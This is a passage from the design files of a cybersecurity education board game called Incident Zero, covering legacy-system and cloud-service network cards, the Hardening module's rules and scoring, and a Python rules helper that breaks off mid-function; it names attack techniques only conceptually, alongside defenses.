  - The attacker will likely compromise a legacy system first
  - Legacy system compromise may lead to lateral movement
  - Legacy systems may lack proper logging (forensics is difficult)

Strategic Trade-off

Teams face a strategic decision: include legacy systems or avoid them?
  - Include Legacy Systems: Realistic, mirrors real organizations, adds challenge
  - Avoid Legacy Systems: Simpler network design, but unrealistic
  - Team Decision: Should reflect the organization's actual legacy system situation


When to Use Legacy System Cards

Use in Network Building Expansion if:

Skip Legacy System Cards if:


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Use a color scheme indicating "difficult/expensive":
     - Dark Red/Brown (Difficult): LEGACY-01, LEGACY-03
     - Orange (Moderate): LEGACY-02, LEGACY-04
  3. Include warning icons (exclamation mark, caution symbol) on cards
  4. Cut along dotted lines
  5. Create a "Legacy System Reference Card" with isolation requirements and key facts

Possible Future Expansions

Additional Legacy System Cards:
  - LEGACY-05: Mainframe Tape Backup System (disaster recovery, retention archiving)
  - LEGACY-06: Proprietary Database System (custom data storage, vendor extinct)
  - LEGACY-07: Dedicated PBX Telephony System (VoIP not yet viable)
  - LEGACY-08: Custom SCADA System (industrial automation, not standard ICS)


Network Building Module: Legacy Systems (Expansion)
Part of Incident Zero, a modular cybersecurity board game v2.1 - Balanced & Refined Edition

cards/network-building/expansion-deck/cloud-variants.md

Network Building Module: Cloud Variants (Expansion)

Version: 2.1 - Balanced & Refined Edition
Last Updated: October 2025


Overview

Cloud Variant Cards extend the Network Building module with advanced cloud deployment options and cloud-native technologies beyond the basic Cloud Workload card in the core deck.


Cloud Variant Cards

CLOUD-01: Containerized Microservices

Type: Cloud-Native Architecture
Cost: 6 Budget (container orchestration platform)
Complexity: 3/4 (requires Kubernetes expertise)
Supported Platforms: AWS ECS, Azure Container Instances, Google Cloud Run, Kubernetes
Application Type: Modern cloud-native applications built as multiple small services

Description: Applications broken into microservices running in containers (Docker). Each service is a separate container that can scale independently. Containers are orchestrated by a platform (Kubernetes, Docker Swarm, ECS).

Key Characteristics:
  - Services: Application broken into small, focused services
  - Containers: Each service runs in a container (isolated environment)
  - Orchestration: Platform automatically manages container deployment, scaling, and recovery
  - Scalability: Each service can scale independently based on demand
  - DevOps: Infrastructure and code are tightly integrated (Infrastructure as Code)
  - Cloud-Native: Built for the cloud (ephemeral resources, auto-scaling, auto-healing)

Key Advantages:
  - Scalability: Auto-scale individual services based on load
  - Resilience: A container failure doesn't affect the entire application
  - Efficiency: Containers share the OS kernel (more efficient than VMs)
  - Velocity: Deploy microservices independently (faster development)
  - Cost: Pay only for resources used (serverless principles)

Key Concerns (Security Perspective):
  - Complexity: Many moving parts, many potential attack surfaces
  - Container Escape: An attacker in one container might escape to the host
  - Supply Chain: Container images come from registries (may be compromised)
  - Secrets Management: Containers need credentials/API keys (risk of exposure)
  - Lateral Movement: Multiple containers in the same cluster; network policies must isolate them
  - Compliance: Tracing data across microservices is complicated
  - Logging: Distributed across many containers (aggregation required)

Defense Strategy:
  - Container Runtime Security: Monitor and restrict container behavior (Falco, Sysdig)
  - Image Scanning: Scan images for vulnerabilities before deployment
  - Network Policies: Kubernetes network policies restrict inter-service communication
  - Pod Security Policies: Restrict what containers can do, e.g. no privilege escalation (the Pod Security Policy API was removed in Kubernetes 1.25 in favor of Pod Security Admission)
  - Registry Security: Scan images in the registry, require signing
  - Secrets Vault: Use HashiCorp Vault or cloud-native secrets (not environment variables)
  - SIEM Integration: Aggregate logs from all containers

Network Interactions:
  - Works with: Cloud-native architecture (ARCH-05)
  - Requires: Container orchestration platform (Kubernetes)
  - Requires: Container registry (Docker Hub, ECR, ACR, GCR)
  - Requires: Secrets management (HashiCorp Vault, AWS Secrets Manager)
  - Integrates with: Microservices architecture (multiple services)

Incident Response Impact:
  - Container compromise may be contained (if network policies work)
  - Container escape would give the attacker access to the host
  - A supply chain attack on container images affects all deployments
  - The distributed nature makes forensics complex
  - Log aggregation is essential for investigation

Team Design Validation:
  - ✓ If including microservices: must include container runtime security
  - ✓ Must include image scanning + signing
  - ✓ Must include network policies
  - ✓ Must include secrets management
  - ✗ Failure: Hardcoded secrets in containers
  - ✗ Failure: No image signing/scanning
  - ✗ Failure: No container network policies


CLOUD-02: Serverless/Function-as-a-Service

Type: Cloud-Native Compute (Abstracted Infrastructure)
Cost: 3 Budget (minimal infrastructure management)
Complexity: 2/4 (simple from an ops perspective, but a different security model)
Supported Platforms: AWS Lambda, Azure Functions, Google Cloud Functions, IBM Cloud Functions
Use Cases: Event-driven processing, API backends, scheduled jobs, data transformation

Description: Functions deployed to a serverless platform. You write code; the platform handles scaling, infrastructure, and execution. You pay only for actual execution time (milliseconds).

Key Characteristics:
  - No Infrastructure: You don't manage servers/containers/VMs
  - Event-Driven: Functions are triggered by events (API call, message queue, schedule, etc.)
  - Auto-Scaling: Automatically scales from zero to thousands of concurrent executions
  - Stateless: Functions should not maintain state (state lives in a database/message queue)
  - Time-Limited: A function has a timeout (usually 15 minutes max)
  - Cost Model: Pay per execution millisecond (very cheap if infrequently called)

Key Advantages:
  - Simplicity: Write code, deploy, done (no servers to manage)
  - Cost: Pay only for execution time (not for idle servers)
  - Scalability: Automatic scaling without configuration
  - Velocity: Rapid deployment cycle (seconds)
  - Reduced Attack Surface: No server to compromise (the provider manages the infrastructure)

Key Concerns (Security Perspective):
  - Dependency Management: The function depends on libraries (vulnerable packages)
  - Secrets in Environment Variables: The function needs credentials (hardcoded or env vars)
  - Supply Chain: Libraries may be compromised (dependency attack)
  - Monitoring Blind Spot: Functions are ephemeral (logs must be aggregated)
  - Cold Start Attacks: Function startup time can leak information
  - Privilege Escalation: The function may have overly broad IAM permissions
  - Denial of Service: The function can be invoked repeatedly (cost/resource attack)
  - Compliance: Difficult to audit function execution (multi-tenant platform)

Defense Strategy:
  - Dependency Scanning: Scan dependencies for vulnerabilities
  - Secrets Management: Use the cloud secrets manager (not environment variables)
  - IAM Least Privilege: The function has the minimum required permissions
  - CloudTrail Logging: Log all function invocations
  - VPC Integration: The function connects to a VPC if it accesses private resources
  - Rate Limiting: Prevent function-invocation DoS
  - Input Validation: Strict validation of all inputs (injection attacks)
  - Library Pinning: Pin exact library versions (prevent supply chain attacks)

Network Interactions:
  - Works with: Cloud-first architecture (ARCH-05)
  - Integrates with: API Gateway (exposes the function as an HTTP endpoint)
  - Integrates with: Message Queues (event-driven triggers)
  - Requires: Secrets Manager (for credentials)
  - Optional: VPC integration for private resource access

Incident Response Impact:
  - Function compromise is possible (code vulnerability or dependency)
  - Function invocation logs are critical (the only audit trail)
  - The multi-tenant platform may complicate forensics
  - A dependency vulnerability affects all functions using the vulnerable library
  - The distributed nature makes understanding the attack chain difficult

Team Design Validation:
  - ✓ If including serverless: must include secrets management
  - ✓ Must include dependency scanning
  - ✓ Must include IAM least-privilege configuration
  - ✗ Failure: Secrets in environment variables
  - ✗ Failure: Overly broad function permissions
  - ✗ Failure: No input validation


CLOUD-03: Database-as-a-Service (Managed Database)

Type: Cloud-Managed Data Layer Cost: 5 Budget (pay per GB + IO operations) Complexity: 1/4 (cloud provider manages infrastructure) Supported Platforms: AWS RDS, Azure SQL Database, Google Cloud SQL, MongoDB Atlas, DynamoDB Database Types: Relational (SQL Server, PostgreSQL, MySQL, Oracle), NoSQL (MongoDB, DynamoDB, Cassandra)

Description: Database managed entirely by cloud provider. You provision database capacity, cloud provider handles: backups, patching, failover, replication, encryption, monitoring.

Key Characteristics:
- Managed: Cloud provider manages infrastructure (patches, backups, upgrades)
- Automated Backup: Point-in-time recovery (no manual backup configuration)
- Replication: Automatic geo-replication for disaster recovery
- Encryption: Encryption at rest and in transit (built-in)
- Scaling: Can scale storage and compute without downtime
- Monitoring: Built-in monitoring and alerting
- Compliance: Provider maintains compliance certifications (SOC 2, HIPAA, PCI-DSS)

Key Advantages:
- Reliability: Provider manages availability (99.99% SLA typical)
- Security: Provider manages patching and security updates
- Compliance: Provider handles compliance certifications
- Cost: No ops team needed to maintain database
- Disaster Recovery: Automated backups and geo-replication
- Scalability: Transparent scaling without downtime

Key Concerns (Security Perspective):
- IAM Configuration: Database access via IAM roles (misconfiguration exposes data)
- Network Exposure: Database may be internet-accessible (must restrict)
- Encryption Keys: Cloud provider manages keys (limited control)
- Audit Logging: Must enable audit logging (not always on by default)
- Data Residency: Where is data stored geographically?
- Backup Security: Backups must be encrypted and access-controlled
- Supply Chain: Vendor is now part of attack surface
- Multi-Tenant: Data may share hardware with other customers (trust model)

Defense Strategy:
- Network Isolation: Database accessible only from application (not internet)
- IAM Least Privilege: Only application has access (not human users)
- Encryption Keys: Use customer-managed keys (not provider-managed)
- Audit Logging: Enable all audit logging (schema changes, access, queries)
- Monitoring: Set up alerting on suspicious queries (large exports, drops, etc.)
- Backup Encryption: Verify backups are encrypted
- Access Control: Disable public IP, use private endpoints only
- Secrets Management: Database credentials in secrets vault (not hardcoded)

Network Interactions:
- Works with: Cloud-first architecture (ARCH-05) or Cloud Hybrid (ARCH-04)
- Integrates with: Application tier (via private endpoint)
- Requires: Secrets management (for credentials)
- Incompatible with: On-premises applications (latency/connectivity issues)

Incident Response Impact:
- Database compromise likely primary attack goal (most valuable data)
- Cloud provider manages baseline security (shifts responsibility model)
- Audit logs are critical evidence (may be only forensics available)
- Backup verification essential (can you restore to pre-attack state?)
- Multi-tenant concerns for sensitive investigations

Team Design Validation:
- ✓ If including managed database: must use private endpoints (not public)
- ✓ Must enable audit logging
- ✓ Must use customer-managed encryption keys
- ✓ Must restrict database IAM permissions
- ✗ Failure: Database public IP exposed to internet
- ✗ Failure: Overly broad IAM permissions (anyone can access)
- ✗ Failure: Audit logging disabled


CLOUD-04: Content Delivery Network (CDN)

Type: Edge Computing / Performance Enhancement
Cost: 4 Budget (pay per GB transferred + requests)
Complexity: 2/4 (configuration required, but well-documented)
Supported Platforms: CloudFlare, AWS CloudFront, Azure CDN, Google Cloud CDN, Akamai
Use Cases: Static assets (images, JS, CSS), web application acceleration, DDoS mitigation

Description: A CDN caches content across globally distributed edge servers. When users request content, they get it from the nearest edge server (fast). This reduces load on the origin server and improves user experience.

Key Characteristics:
- Distributed Caching: Content cached at 100+ edge locations worldwide
- Fast Delivery: Users get content from nearest edge (milliseconds)
- Origin Protection: Origin server behind CDN (hides IP, reduces load)
- DDoS Protection: CDN absorbs DDoS attacks before reaching origin
- SSL/TLS Termination: CDN handles encryption (origin can use HTTP)
- Rate Limiting: Can rate-limit requests per IP
- Security Headers: Can inject security headers (HSTS, CSP, etc.)

Key Advantages:
- Performance: Content delivery 100x faster globally
- DDoS Protection: Built-in DDoS mitigation
- Security: Origin IP hidden, security scanning at edge
- Cost Efficiency: Reduces origin server bandwidth costs
- Geo-Location: Can route users to different content based on location

Key Concerns (Security Perspective):
- Cache Poisoning: Attacker poisons CDN cache with malicious content
- Origin Bypass: Attacker finds origin IP, bypasses CDN security
- SSL Stripping: CDN can decrypt traffic (must trust CDN provider)
- Cookie Security: Sensitive cookies may be cached (GDPR/privacy issue)
- Personalization: Cached content loses personalization (may expose user data)
- Configuration Mistakes: Wrong cache settings may cache sensitive content
- Origin Protection: Still need to protect origin server (CDN is not complete solution)
- Bot Attack: Attackers can still target origin through CDN

Defense Strategy:
- Cache Settings: Do not cache sensitive content (set cache headers)
- Origin Protection: Implement Web Application Firewall (WAF) on origin
- Rate Limiting: Configure CDN rate limiting rules
- DDoS Settings: Enable DDoS protection features
- SSL Validation: Verify SSL certificates (prevent MITM)
- Geoblocking: Block traffic from unwanted regions (geo-restrictions)
- Security Headers: Implement security headers (HSTS, CSP, X-Frame-Options)
- Origin IP Hiding: Use origin concealment (hide real IP)
- Monitoring: Monitor for suspicious CDN patterns

Network Interactions:
- Works with: Web application (static assets + dynamic content)
- Works with: Cloud Hybrid (ARCH-04) or Cloud First (ARCH-05)
- Complements: Web Application Firewall (WAF)
- Optional with: Infrastructure (performance enhancement, not required)

Incident Response Impact:
- CDN compromise could distribute malware to all users (supply chain attack)
- Cache poisoning affects entire user base
- Origin IP exposure could enable direct attacks on origin server
- CDN logs are evidence (attacker activity visible in CDN analytics)
- DDoS attack visibility (CDN shows attack patterns)

Team Design Validation:
- ✓ If including CDN: must configure cache headers correctly
- ✓ Must enable security features (DDoS, WAF, rate limiting)
- ✓ Should hide origin IP
- ✗ Failure: Caching sensitive/personalized content
- ✗ Failure: Disabled security features
- ✗ Failure: Origin IP exposed


Cloud Variants Card Summary

| Card | Technology | Cost | Complexity | Primary Benefit |
|---|---|---|---|---|
| CLOUD-01 | Microservices | 6 | 3/4 | Scalability & Velocity |
| CLOUD-02 | Serverless | 3 | 2/4 | Simplicity & Cost |
| CLOUD-03 | Managed DB | 5 | 1/4 | Reliability & Compliance |
| CLOUD-04 | CDN | 4 | 2/4 | Performance & DDoS Protection |

Design Philosophy

Key Principle: Different Cloud Services, Different Security Models

Each cloud variant represents different architectural choices:
- Microservices: Scalability + complexity (many attack surfaces)
- Serverless: Simplicity + different threat model (function-level security)
- Managed Database: Reliability + shared responsibility (provider + customer)
- CDN: Performance + edge computing (distributed security)

Organizations use combinations of these services:
- Serverless functions backed by managed database (simple, scalable, reliable)
- Microservices deployed globally via CDN (scalable, fast, available)
- Mix of serverless and containers (different workloads, different approaches)


Gameplay Impact

Network Design Flexibility

Cloud variants add flexibility to network design:
- Can build entirely on serverless (very simple, minimal infrastructure)
- Can mix serverless + containers (different workloads)
- Can add CDN for global distribution
- Can use managed database for all data needs

Cost Considerations

Cloud variants have different cost models:
- Serverless: Cheap if used occasionally, expensive if always running
- Microservices: Scale-to-zero not available (always running cost)
- Managed Database: Scale with usage (can get expensive)
- CDN: Cheap for low traffic, expensive for high traffic

Complexity Trade-offs

Cloud variants trade operational complexity for different concerns:
- Serverless: No ops burden, but security mindset different
- Microservices: Ops burden (Kubernetes), but powerful scalability
- Managed Database: No ops burden, but IAM misconfiguration risk
- CDN: Config once, then mostly set-and-forget


When to Use Cloud Variants

Use in Network Building Expansion if:

Skip Cloud Variants if:


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by deployment type:
     - Blue (Containers): CLOUD-01
     - Green (Serverless): CLOUD-02
     - Purple (Data): CLOUD-03
     - Orange (Delivery): CLOUD-04
  3. Include cloud provider logos if desired (AWS, Azure, GCP)
  4. Cut along dotted lines
  5. Create a "Cloud Architecture Reference Card" comparing services

Integration with Core Cloud Cards

Cloud Core Deck (from core-deck/architecture-cards.md)

Recommended Combinations


Possible Future Expansions

Additional Cloud Variant Cards:
- CLOUD-05: Machine Learning Platform (ML training/inference)
- CLOUD-06: Event Streaming (Kafka, pub/sub architectures)
- CLOUD-07: Search & Analytics (Elasticsearch, BigQuery)
- CLOUD-08: API Gateway (API management and rate limiting)
- CLOUD-09: Message Queue (async processing, event-driven)
- CLOUD-10: Infrastructure as Code Platform (automated deployment)


Network Building Module: Cloud Variants (Expansion)
Part of Incident Zero, a modular cybersecurity board game v2.1 - Balanced & Refined Edition

docs/rules/module-hardening.md

Hardening Module: Complete Rules

Version: 2.2 - Playtest Edition
Module Duration: 20-45 minutes (standalone or after Incident Response)
Prerequisites: None (can play standalone) or completion of Incident Response module
Learning Focus: Defense-in-depth, security architecture, proactive hardening, layered controls


Module Overview

The Hardening Module teaches players how to build multi-layered security controls that work together to protect critical systems. Players transition from reactive incident response to proactive security design.

This module can be:
- Standalone: Play alone with generated threat context
- Continuation: Follow a successful Incident Response (players harden against discovered threats)
- Paired: Combined with other modules for complete security lifecycle training


Core Mechanics: What's Different from Incident Response

| Aspect | Incident Response | Hardening |
|---|---|---|
| Focus | Detect hidden threats | Build defenses against known threats |
| Time Pressure | High (variable turn limit, 100 budget) | Lower (7 turns, carries budget forward) |
| Actions | Investigate, Deploy, Emergency Response | Deploy, Upgrade, Playbook, Test |
| Rolls Needed | Investigation & Defense deployments | Test & Drill and Pentester defense rolls |
| Scoring | Detection efficiency | Defense layering & breadth |
| Threats | Hidden chain | Known vectors, Pentester tactics |

Setup

Step 1: Determine Your Context

Option A: Standalone Play (Fresh Start)

Generate threat context from scratch (v2.2 — one standard procedure):
- Roll 1d6 for each of the six threat vectors (SOCIAL_ENGINEERING, WEB_EXPLOIT, CREDENTIAL_ABUSE, MALWARE, NETWORK, DATA_EXFIL):
  - 1-2: No notable threat on this vector
  - 3-4: Intermediate threat on this vector
  - 5-6: Advanced threat on this vector
- Or use Threat Orchestrator's chosen scenario
- Budget: 150 (full planning allocation)

Option B: Continuation from Incident Response

Use the attack chain that was just discovered:
- All revealed threat cards now represent known attack vectors
- Each vector gets a defense priority
- Budget carries over (minimum 20, maximum 150)
- Example: If IR revealed Phishing, Lateral Movement, and Data Exfil, you harden against those specific vectors

Option C: Hypothetical Scenario

Threat Orchestrator describes a realistic scenario:

"Imagine your team successfully detected an attack chain:
1. Phishing campaign (SOCIAL ENGINEERING vector)
2. Lateral movement via SMB (NETWORK vector)
3. Data exfiltration (DATA EXFIL vector)

You have time to harden your network. Here are the threat vectors you need to defend against..."

Step 2: Initialize Trackers

Step 3: Prepare Card Decks

Step 4: Deal Starting Hand

Each Blue Team receives 5 Defense Cards (drawn randomly, face down in hand)

Step 5: Read Opening Narrative

Threat Orchestrator provides context for the hardening scenario:

"Your detection team successfully identified an attack chain. Now you have time and resources to harden your defenses to prevent similar attacks in the future. Here's what you're defending against and what assets are at risk..."


Gameplay: 7 Turns

The Hardening module runs 7 turns at every difficulty level (v2.2 — difficulty scales through the number of Pentester Tactics, not the turn count). One action per turn.

Turn Structure

START OF TURN
- Announce turn number: "Hardening Turn 3..."
- Announce remaining Budget
- Declare any Pentester Challenge scheduled for this turn

PLANNING PHASE (2-3 minutes)
- Team discusses hardening strategy
- Decides which action to take this turn
- Prepares for any mid-turn Pentester Challenge

ACTION PHASE
- Execute chosen action (see below)
- Resolve rolls if applicable
- Update trackers

END OF TURN
- Advance turn counter
- Draw 1 new Defense Card
- Check if Pentester Challenge occurs (typically turn 3-4)


Four Hardening Actions

Action 1: Deploy a New Defense 🛡️

Cost: 10/15/25 Budget (based on card tier)
Roll Required: None—automatic success

How it works:
1. Choose a Defense Card from your hand
2. Announce which Asset or threat vector it protects
3. Place card on the table (face up)
4. Optional: Explain the deployment strategy (enhances learning but not required)

Effect:
- Defense is immediately active and deployed
- Counts toward Security Score (5 points per defense)
- Cannot be undone (represents permanent security improvement)
- Stays on board for remainder of module and beyond (if continuing)

Quick-Win Rule (v2.2): You may deploy up to 2 BASIC-tier defenses as a single action (pay 10 Budget each). This keeps foundational hygiene affordable within the 7-turn limit.

Examples:
- Deploy Multi-Factor Authentication (ADVANCED - 15 Budget) on VPN access
- Deploy EDR on all workstations (ADVANCED - 15 Budget)
- Deploy Data Loss Prevention (DLP) on network gateways (ADVANCED - 15 Budget)
- Deploy Email Authentication (BASIC - 10 Budget) and User Security Training (BASIC - 10 Budget) together as one action (v2.2 Quick-Win)

Strategic Notes:
- BASIC defenses (10 Budget) are cheaper but carry smaller printed bonuses against Pentester Tactics
- ADVANCED defenses (15 Budget) provide good balance of cost/effectiveness
- ELITE defenses (25 Budget) are expensive but carry the largest printed bonuses against Pentester Tactics


Action 2: Harden an Existing Defense ⬆️

Cost: 5 Budget per upgrade
Roll Required: None

How it works:
1. Choose a Defense Card already deployed (earlier this game, or carried over from Incident Response)
2. Pay 5 Budget
3. Mark defense with +2 effectiveness bonus (track on paper)
4. Optional: Describe the hardening (e.g., "Tuning behavioral analytics in EDR")

Effect:
- Defense effectiveness increases by +2
- Bonuses stack (EDR with three upgrades = +6 total)
- Counts toward Security Score (2 points per upgrade)
- Makes defense more resistant to Pentester Tactics

Examples of Hardening:
- "Harden our MFA by requiring hardware tokens instead of SMS" → MFA now has +2
- "Enhance Network Segmentation with microsegmentation inside critical zones" → NS now has +2
- "Improve SIEM with threat intelligence integration" → SIEM now has +2

Strategic Value:
- Fewer, well-hardened defenses can beat many basic ones
- Upgrades compound: 3 upgrades on one defense = +6 bonus
- Cost-effective way to improve security posture without full new deployments


Action 3: Prepare an Incident Response Playbook 📋

Cost: 10 Budget per playbook
Roll Required: None
Limit (v2.2): Maximum 2 playbooks per game

How it works:
1. Choose a specific threat vector you want to prepare for (SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, or DATA EXFIL)
2. Write a 1-2 sentence playbook describing your response plan
3. Place playbook on the table with vector marked
4. When an attack using this vector occurs, you get one-time +3 bonus to your defense roll

Effect:
- Provides one-time +3 bonus to defense roll when matching vector is attacked
- Playbook is discarded after use (one-time only)
- Counts toward Security Score (10 points per playbook)
- Forces strategic thinking about which threats matter most

Example Playbooks:
- SOCIAL ENGINEERING: "Credential Compromise Response - Forced MFA re-authentication and access token revocation across all systems"
- MALWARE: "Ransomware Response - Immediate backup isolation, network segmentation, and process termination"
- NETWORK: "Lateral Movement Detection - Real-time network behavior analysis and suspicious SMB activity alert protocol"
- DATA EXFIL: "Data Theft Response - DLP block, endpoint containment, and forensic image capture"
- WEB EXPLOIT: "Web Attack Response - Immediate application firewall rule deployment and vulnerable component isolation"

Strategic Considerations:
- Playbooking is expensive (10 Budget) but provides large bonus (+3)
- You can only use each playbook once, and only create two per game (v2.2) — plan carefully
- Encourages predicting which threats are most dangerous
- Reflects real-world incident response playbook development
- Playbooks alone cannot win the game: victory requires at least 4 deployed defenses (v2.2)


Action 4: Test & Drill Defenses 🎯

Cost: 0 Budget (represents time investment)
Roll Required: 11+ on d20

How it works:
1. Announce you're conducting a security drill
2. Choose one or more deployed defenses to test
3. For each defense, roll 1d20
4. Defenses with roll 11+ are successful; 10 or less fail

Effect:
- Successful tests: Defense works properly (tracked as "tested")
- Failed tests: Implementation issues found (no penalty, but noted)
- Tests don't contribute to final score but provide confidence
- Teaches the importance of validation and testing

Educational Value:
- Reflects real-world practice of security testing
- Validates that deployments actually work
- Costs no Budget, so it is a cheap way to spend a turn on validation rather than on a new deployment


Mid-Game: Pentester Challenge

When Pentester Tactics Are Used

Typically after turn 3 or 4, once teams have deployed initial defenses.

Timing Options:
- Per turn: One Pentester Tactic drawn each turn (turns 3-6)
- Multiple attacks: 2-4 Pentester Tactics total (depends on difficulty)
- Final challenge: All remaining Tactics drawn at end of turn 6

Pentester Tactic Cards (PT-01 to PT-08)

(v2.2) The Hardening module uses the standard Pentester Tactic deck, PT-01 to PT-08, defined in cards/hardening/core-deck/pentester-tactic-cards.md. Each card is a realistic red-team technique with a printed DC (difficulty class) and a list of printed defense bonuses for specific Defense Cards.

| Card | Tactic | Target Vectors | Difficulty | Primary Defense |
|---|---|---|---|---|
| PT-01 | Social Engineering - Pretexting Attack | SOCIAL_ENGINEERING, CREDENTIAL_ABUSE | BASIC (DC 12) | D-02 User Training |
| PT-02 | Malware Evasion - Living-off-the-Land | MALWARE, CREDENTIAL_ABUSE | INTERMEDIATE (DC 13) | D-08 EDR |
| PT-03 | Credential Dumping - Mimikatz | CREDENTIAL_ABUSE, MALWARE | INTERMEDIATE (DC 13) | D-16 Credential Guard |
| PT-04 | Lateral Movement - Network Traversal | NETWORK, CREDENTIAL_ABUSE | INTERMEDIATE (DC 13) | D-09 Network Segmentation |
| PT-05 | Privilege Escalation - Unpatched Kernel Exploit | MALWARE, WEB_EXPLOIT | ADVANCED (DC 14) | D-03 Patch Management |
| PT-06 | Data Exfiltration - Unmonitored Channel | DATA_EXFIL, NETWORK | ADVANCED (DC 14) | D-11 DLP |
| PT-07 | Supply Chain Compromise - Trusted Update | MALWARE, WEB_EXPLOIT | ADVANCED (DC 14) | D-08 EDR / D-13 Threat Hunting |
| PT-08 | Insider Threat - Malicious Administrator | CREDENTIAL_ABUSE, DATA_EXFIL, NETWORK | EXPERT (DC 15) | D-22 SIEM / D-20 Zero Trust |

For expansion play, 8 additional tactics (PT-09 to PT-16) are available in cards/hardening/expansion-deck/advanced-tactics.md.


Attack Resolution: One Canonical Formula (v2.2)

When a Pentester Tactic Card is drawn:

1. Threat Orchestrator Describes the Attack

Example (PT-01): "A pentester calls your IT helpdesk impersonating a VIP executive, demanding emergency access to critical systems..."

2. Blue Team Chooses ONE Deployed Defense to Resolve With

Example: "We resolve this with our User Security Training (D-02) — staff are trained to verify callers."

3. Roll the Defense Roll

Defense roll = d20
             + printed defense bonus for the chosen defense (from the tactic card's bonus list)
             + hardening upgrades on that defense (+2 each)
             + relevant playbook (+3, one-time, matching vector)

Success if the total ≥ the tactic card's printed DC.

Notes:
- Only ONE defense's printed bonus applies per roll. If your chosen defense isn't on the tactic's bonus list, its printed bonus is +0 (upgrades and playbooks still apply).
- Multi-vector or multi-phase tactics (e.g., PT-09): resolve each vector/phase as a separate roll, one chosen defense per roll.
- Playbooks are discarded after use.

4. Worked Example

Tactic: PT-01 Social Engineering - Pretexting (DC 12)
Chosen defense: D-02 User Security Training (printed bonus +2 vs PT-01)
D-02 has 1 hardening upgrade (+2)
SOCIAL ENGINEERING playbook available (+3)

Roll 1d20 = 7
Total = 7 + 2 (printed) + 2 (upgrade) + 3 (playbook) = 14
14 ≥ DC 12 → SUCCESS. Playbook is discarded.

5. Outcome

(v2.2: the old -10 Reputation penalty has been removed from Hardening — failed defenses simply score nothing and trigger the card's printed consequence. Reputation remains a Disaster Recovery mechanic.)


Scoring: Security Score Calculation

Final Security Score Formula (v2.2 — one formula, used in both rules and standalone guide)

Security Score = (Defenses Deployed × 5)
               + (Hardening Upgrades × 2)
               + (Playbooks Created × 10)      [max 2 playbooks]
               + (Pentester Tactics Defended × 5)
               + (Budget Remaining / Starting Budget) × 10

Example Scoring (7 turns, 150 starting budget)

Turn 1: Deploy D-01 Email Auth + D-02 User Training (2 BASIC as one action)  -20
Turn 2: Deploy D-04 Firewall Rules + D-19 Backup & DR (2 BASIC)              -20
Turn 3: Deploy D-08 EDR (ADVANCED)                                           -15
        → PT-02 strikes: defended ✓
Turn 4: Deploy D-09 Network Segmentation (ADVANCED)                          -15
Turn 5: Create MALWARE playbook                                              -10
        → PT-01 strikes: defended ✓
Turn 6: Harden D-08 EDR (+2)                                                  -5
Turn 7: Deploy D-11 DLP (ADVANCED)                                           -15
        → PT-06 strikes: defended ✓ (D-11's printed +4 bonus vs DC 14 carried the roll)

Budget spent: 100 → 50 remaining

Defenses Deployed:      7 × 5  = 35 points
Hardening Upgrades:     1 × 2  =  2 points
Playbooks Created:      1 × 10 = 10 points
Tactics Defended:       3 × 5  = 15 points
Budget Efficiency: (50/150) × 10 ≈ 3 points
─────────────────────────────────────
FINAL SECURITY SCORE:            65 points → Strong (Victory)

Security Score Tiers (v2.2 — rescaled for the 7-action economy)

| Score | Level | Interpretation | Real-World Equivalent |
|---|---|---|---|
| 75+ | Exceptional | Enterprise-grade security posture | Large financial institution |
| 60-74 | Strong | Comprehensive defense-in-depth | Mid-market company |
| 45-59 | Adequate | Basic layered protection | Startup/small business |
| 30-44 | Weak | Minimal defenses, significant gaps | Under-resourced organization |
| Below 30 | Vulnerable | Inadequate protection, likely to fail | High-risk organization |

Winning & Losing Hardening

Victory Condition ✓ (v2.2)

Blue Team Wins Hardening if ALL of:
- Final Security Score ≥ 60 (strong, comprehensive defense-in-depth)
- AND at least 4 defenses deployed (playbooks and upgrades alone cannot win)
- AND majority of Pentester Tactics defended against (defenses actually work)

Interpretation: Team successfully built layered, effective defenses within constraints.

Defeat Condition ✗

Blue Team Loses Hardening if:
- Final Security Score < 45 (inadequate overall protection)
- OR Budget exhausted before completing hardening strategy
- OR majority of Pentester Tactics succeeded (defenses aren't effective)

Interpretation: Defenses are insufficient against realistic threats.

Scores between 45 and 59 that meet the tactic/defense requirements count as a partial success — adequate protection with room to improve.
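To make the resolution formula, the Security Score formula and the win/loss gates above checkable at the table, here is an added Python example (not part of the Incident Zero rules or project code). It encodes the v2.2 defense roll, the scoring formula and the victory gates, then replays the 7-turn scoring example and the playbook-spam case from the designer note. DCs, vectors and the +2 (D-02 vs PT-01) and +4 (D-11 vs PT-06) bonuses come from this page; the d20 results and D-08's +3 against PT-02 are constructed assumptions.

```python
from __future__ import annotations
from collections import namedtuple
from dataclasses import dataclass, field

TIER_COST = {"BASIC": 10, "ADVANCED": 15, "ELITE": 25}   # Deploy cost per card, by tier
# A Pentester Tactic card: printed DC, printed target vectors, printed bonus per defense id.
Tactic = namedtuple("Tactic", ["dc", "vectors", "bonuses"])

@dataclass
class Game:
    starting_budget: int = 150
    budget: int = 150
    defenses: dict[str, int] = field(default_factory=dict)  # deployed card id -> upgrades
    playbooks: set[str] = field(default_factory=set)        # unspent playbooks, by vector
    playbooks_created: int = 0
    tactics_faced: int = 0
    tactics_defended: int = 0

    def _spend(self, amount: int) -> None:
        if amount > self.budget:
            raise ValueError("budget exhausted")
        self.budget -= amount

    def deploy(self, tier: str, *card_ids: str) -> None:
        """Action 1; the Quick-Win rule lets two BASIC cards share one action."""
        if len(card_ids) > 2 or (len(card_ids) == 2 and tier != "BASIC"):
            raise ValueError("one defense per action, or two BASIC defenses (Quick-Win)")
        self._spend(TIER_COST[tier] * len(card_ids))
        self.defenses.update({c: 0 for c in card_ids})

    def harden(self, card_id: str) -> None:
        self._spend(5)                     # Action 2: +2 effectiveness per upgrade
        self.defenses[card_id] += 1

    def create_playbook(self, vector: str) -> None:
        if self.playbooks_created >= 2:    # Action 3: v2.2 cap of 2 playbooks per game
            raise ValueError("v2.2 cap: at most 2 playbooks per game")
        self._spend(10)
        self.playbooks.add(vector)
        self.playbooks_created += 1

    def resolve_tactic(self, tactic: Tactic, chosen: str | None, d20: int) -> bool:
        """d20 + printed bonus of ONE chosen defense (+0 if off-list) + 2 per upgrade on it
        + 3 for a held playbook matching a tactic vector, vs the printed DC."""
        total = d20
        if chosen is not None:
            total += tactic.bonuses.get(chosen, 0) + 2 * self.defenses[chosen]
        # Assumption: a matching playbook is always spent when one is held.
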